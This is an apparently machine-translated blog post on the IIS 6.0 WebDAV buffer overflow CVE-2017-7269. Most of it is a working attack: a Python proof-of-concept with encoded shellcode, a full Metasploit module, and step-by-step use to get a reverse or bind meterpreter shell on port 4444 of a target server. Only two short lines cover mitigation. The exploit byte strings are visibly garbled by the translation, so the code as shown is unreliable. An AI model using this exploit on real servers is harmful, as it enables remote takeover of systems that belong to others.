IIS6.0 Remote Command Execution Vulnerability (CVE-2017-7269)

The talent determines the upper limit you can reach, and the level of effort determines the lower limit you can reach.
With the low level of effort of the vast majority of people, it is far from reaching the point of talenting.
This article is used to record information about IIS6.0 WebDav remote command execution vulnerability, detection and utilization methods, and most of the contents. From the Internet, record your notes here.

Disclaimer: * The tools in the article are for personal testing and research. Please delete them within 24 hours after downloading. Do not use them for commercial or illegal purposes.

Vulnerability Information

Vulnerability ID: CVE-2017-7269
Discovered personnel: Zhiniang Peng and Chen Wu (Information Security Laboratory, School of Computer Science and Engineering, South China University of Technology)
Vulnerability brief: IIS 6.0 with WebDAV service is vulnerable to cache overflow caused by remote code execution. Currently, it can be used stably for Windows Server 2003 R2. The vulnerability was first exploited in the field in July and August 2016.
Vulnerability Type: Buffer Overflow
Vulnerability level: high risk
Impact product: Microsoft Windows Server 2003 R2 IIS6.0 with WebDAV service enabled (currently verified, other versions have not been verified)
Trigger function: ScStoragePathFromUrl function
Additional Information: The ScStoragePathFromUrl function was called twice
Vulnerability Details: A buffer overflow vulnerability exists in the ScStoragePathFromUrl function of the WebDAV service of IIS 6.0 in Windows Server 2003. The attacker executes arbitrary code through a PROPFIND request with a longer header header starting with “If: <Http://“.

Utilization conditions

  • iis6.0
  • Enable WebDav function (specifically PROPFIND method, return 207 or 200 if successful)
  • windows server 2003 R2

Little

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
#------------Our payload set up a ROP chain by using the overflow 3 times. It will launch a calc.exe which shows the bug is really dangerous.
#written by Zhiniang Peng and Chen Wu. Information Security Lab & School of Computer Science & Engineering, South China University of Technology Guangzhou, China
#-----------Email: edwardz@foxmail.com
import socket
sock = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
sock.connect(('127.0.0.1',80))
pay='PROPFIND / HTTP/1.1\r\nHost: localhost\r\nContent-Length: 0\r\n'
pay+='If: <http://localhost/aaaaaaa'
pay+='>'
pay+=' (Not <locktoken:write1>) <http://localhost/bbbbbbb'
pay + = '\ x6 \ x86 \ x86 \ x86 \ \ x9 \ x9 \ x9 \ x9 \ x9 \ x9 \ x9 \ x8 \ x9 \ x9 \ x9 \ x3 \ xe5 \ x86 \ x86 \ x8 \ x8 \ x8 \ x8 \ x8 \ x8 \ x8 \ x8 \ x8 \ x8 \ x8 \ \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ xe6 \ x86 \ x86 \ x8 \ x8 \ x8 \ x8 \ x8 \ x8 \ x8 \ x8 \ x8 \ x8 \ xa \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ xa9 \ xe3 \ x9 \ xe4 \ xe4 \ xe9 \ xa4 \ xe6 \ x8 \ x8 \ xe6 \ x8 \ x8 \ xe6 \ x86 \ x86 \ x86 \ x9 \ x9 \ x9 \ x9 \ x9 \ x9 \ x9 \ x9 \ x9 \ x9 \ x9 \ x8d \ xb9 \ xe6 \ xa1 \ xb7 \ xe7 \ xa9 \ x96 \ xe6 \ x85 \ x8a \ xe3 \ xa5 \ x86 \ x86 \ x86 \ x8 \ x b2 \ xe5 \ x8d \ xa5 \ xe5 \ xa1 \ x8a \ xe4 \ x91 \ x8e \ xe7 \ xa9 \ x84 \ xe6 \ xb0 \ xb5 \ xe5 \ xa9 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ \ x8 \ x8 \ x8 \ x8 \ x8 \ x8 \ x8 \ x8 \ x8 \ x8 \ x8 \ x8 \ x8 \ x8 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ xe6 \ x86 \ x86 \ x86 \ x8 \ x8 \ x8 \ x8 \ x8 \ x8 \ x8 \ x8 \ x8 \ x8 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ xa3 \ xe6 \ xa0 \ x81 \ xe1 \ x91 \ xa0 \ xe6 \ xa0 \ x83 \ xcc \ x80 \ xe7 \ xbf \ xbe \ xef \ xbf \ xbf \ xef \ xbf \ xbf \ xe1 \ xa0 \ x86 \ xe1 \ x8 \ x8 \ x8 \ x8 \ x8 \ x8 \ x8 \ x8 \ x8 \ x8 \ xe9 \ x86 \ x86 \ x9 \ x8 \ x9 \ x8 \ x8 \ x8 \ x8 \ x8 \ x8 \ x8 \ x8 \ x86 \ x8a \ xe7 \ xa5 \ xaa \ xe7 \ x9 \ x9 \ x8 \ x8 \ x8 \ x8 \ x8 \ x8 \ x8 \ x8 \ x a9 \ xe3 \ x99 \ xac \ xe4 \ x91 \ xa8 \ xe4 \ xb5 \ xb0 \ xe8 \ x86 \ x86 \ xe6 \ xa0 \ x80 \ xe4 \ xa1 \ xb7 \ xe3 \ xe6 \ x8 \ x8 \ x8 \ xe6 \ x8 \ x8 \ x8 \ x8 \ x8 \ x8 \ x8 \ x8 \
shellcode='VVYA4444444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JB6X6WMV7O7Z8Z8Y8Y2TMTJT1M017Y6Q01010ELSKS0ELS3SJM0K7T0J061K4K6U7W5KJLOLMR5ZNL0ZMV5L5LMX1ZLP0V3L5O5SLZ5Y4PKT4P4O5O4U3YJL7NLU8PMP1QMTMK051P1Q0F6T00NZLL2K5U0O0X6P0NKS0L6P6S8S2O4Q1U1X06013W7M0B2X5O5R2O02LTLPMK7UKL1Y9T1Z7Q0FLW2RKU1P7XKQ3O4S2ULR0DJN5Q4W1O0HMQLO3T1Y9V8V0O1U0C5LKX1Y0R2QMS4U9O2T9TML5K0RMP0E3OJZ2QMSNNKS1Q4L4O5Q9YMP9K9K6SNNLZ1Y8NMLML2Q8Q002U100Z9OKR1M3Y5TJM7OLX8P3ULY7Y0Y7X4YMW5MJULY7R1MKRKQ5W0X0N3U1KLP9O1P1L3W9P5POO0F2SMXJNJMJS8KJNKPA'
pay+=shellcode
pay+='>\r\n\r\n'
print pay
sock.send(pay)
data = sock.recv(80960)
print data
sock.close

poc from: https://github.com/edwardz246003/IIS_exploit/blob/master/exploit.py

Modify the code sock.connect((‘127.0.0.1’,80)), change the ip address to the target website ip, run the py file, and generate a calc process (calculator) on the target server.

Exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super (update_info (info,
'Name' => 'CVE-2017-7269 Microsoft IIS WebDav ScStoragePathFromUrl Overflow',
'Description' => %q{
Buffer overflow in the ScStoragePathFromUrl function in the WebDAV service in Internet Information Services (IIS) 6.0 in Microsoft Windows Server 2003 R2 allows remote attackers to execute arbitrary code via a long header beginning with "If: <http://" in a PROPFIND request, as exploited in the wild in July or August 2016.
Original exploit by Zhiniang Peng and Chen Wu.
},
'Author' => [ 'Dominic Chell <dominic@mdsec.co.uk>' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', 'CVE-2017-7269'],
[ 'BID', '97127'],
[ 'URL', 'https://github.com/edwardz246003/IIS_exploit'],
],
'Privileged' => false,
'Payload' =>
{
'Space' => 2000,
'BadChars' => "\x00",
'EncoderType' => Msf::Encoder::Type::AlphanumUnicodeMixed,
'DisableNops' => 'True',
'EncoderOptions' =>
{
'BufferRegister' => 'ESI',
}
},
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'PrependMigrate' => true,
'PrependMigrateProc' => "calc"
},
'Targets' =>
[
[
'Microsoft Windows Server 2003 R2',
{
'Platform' => 'win',
},
],
],
'Platform' => 'win',
'DisclosureDate' => 'March 26 2017',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(80)
], self.class)
end
def exploit
connect
buf1 = "If: <http://localhost/aaaaaaa"
buf1 << ">"
buf1 << " (Not <locktoken:write1>) <http://localhost/bbbbbbb"
buf1 << "\ xe7 \ xa5 \ x88 \ xe6 \ x85 \ xb5 \ xe4 \ xbd \ x83 \ xe6 \ xbd \ xa7 \ xe6 \ xad \ xaf \ xe4 \ xa1 \ x85 \ xe3 \ x99 \ x86 \ xe6 \ x9d \ xe5 \ x9 \ x9 \ x9 \ x9 \ x9 \ x9 \ x9 \ x9 \ x9 \ x9 \ x8 \ xe3 \ x9 \ x9 \ xe5 \ x9 \ x9 \ \ x86 \ x86 \ x8 \ x8 \ x8 \ x8 \ x8 \ x8 \ x8 \ x8 \ x8 \ x8 \ x8 \ x8 \ x8 \ x8 \ x8 \ \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x8 \ \ x8 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ \ xe9 \ x8 \ x8 \ x8 \ x8 \ x8 \ x8 \ x8 \ x8 \ x8 \ x8 \ x8 \ x8 \ x8 \ x8 \ x8 \ \ x86 \ x86 \ x86 \ x86 \ x9 \ x9 \ x9 \ x9 \ x9 \ x9 \ x9 \ x9 \ x9 \ x9 \ x9 \ x9 \ x9 \ \ x8d \ xb9 \ xe6 \ xa1 \ xb7 \ xe6 \ xa9 \ x96 \ xe6 \ x85 \ x8a \ xe3 \ xa5 \ x85 \ xe3 \ x98 \ xb9 \ xe6 \ xb0 \ 1 \ x8 \ xe5 \ x8d \ xa5 \ xe5 \ xa1 \ x8a \ xe4 \ x91 \ x8e \ xe7 \ xa9 \ x84 \ xe6 \ xb0 \ xb5 \ xe5 \ xa9 \ \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ xe6 \ x86 \ x8 \ x8 \ x8 \ x8 \ x8 \ x8 \ x8 \ x8 \ x8 \ x8 \ x8 \ x8 \ x8 \ xa5 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x8 \ x8 \ x8 \ x8 \ x8 \ x8 \ x8 \ x8 \ x8 \ x8 \ xe6 \ x8 \ x8 \ x8 \ x8 \ x8 \ x8 \ x8 \ x8 \ x8 \ x8 \ x8 \ x8 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ xe7 \ x86 \ x8a \ xe7 \ x8 \ x8a \ xe7 \ xa5 \ xa1 \ xe1 \ x9 \ x9 \ xe6 \ xa6 \ x8 \ x8 \ xb \ X86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ x86 \ xaa \ xe6 \ xa0 \ x82 \ xe6 \ xbd \ xaa \ xe4 \ x8c \ xb5 \ xe1 \ x8f \ xb8 \ xe6 \ xa0 \ x83 \ xe2 \ xa7 \ xa7 \ xe6 \ xa0 \ x81 "
buf1 << payload.encoded
sock.put("PROPFIND / HTTP/1.1\r\nHost: localhost\r\nContent-Length: 0\r\n#{buf1}>\r\n\r\n")
handler
disconnect
end

github address: https://github.com/dmchell/metasploit-framework/pull/1/commits/9e8ec532a260b1a3f03abd09efcc44c30e4491c2

Usage

Create a new file, such as: cve-2017-7269.rb, copy the above code (or download the file directly).
Locate the metasploit installation directory and place the cve-2017-7269.rb file in the opt/metasploit/apps/pro/msf3/modules/exploit/windows/iis/ directory. (I tried it on the mac, the directory is different, and it is placed in this directory for the convenience of classification management).

Run msfconsole and load the cve-2017-7269 module

1
2
3
>use exploit/windows/iis/cvce-2017-7269
>set RHOST 192.168.4.244 #Set target IP
>exploit


Running the exploit will monitor the 4444 port on the local machine. The vulnerable target server will connect to the local 4444 port and bounce a meterpreter. (provided the target server can ping the machine)

Execute shell commands via meterpreter, bounce cmdshell

This module will load the reverse_tcp payload by default, which is used to make the target server remotely connect to a local port. Of course, we can also change the payload and change it to bind_tcp, which is used to let the target server listen to a port and the local active connection pops up the shell.

1
>set PAYLOAD windows/meterpreter/bind_tcp

After the change, test again

Run the exploit, the target server listens on port 4444, and the machine connects to the 4444 port of the target, bounces a meterpreter. (provided that the machine can ping the target server)

Enter set in the msf module to view the items that can be modified, all than the show options.

Temporary solution

  • Close the WebDAV service
  • Use related protective equipment

本文标题:IIS6.0 Remote Command Execution Vulnerability (CVE-2017-7269)

文章作者:nmask

发布时间:2017年03月29日 - 20:03

最后更新:2019年08月16日 - 15:08

原始链接:https://thief.one/2017/03/29/IIS6-0 Remote Command Execution Vulnerability - CVE-2017-7269/

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。

nmask wechat
欢迎您扫一扫上面的微信公众号,订阅我的博客!
坚持原创技术分享,您的支持将鼓励我继续创作!

热门文章推荐: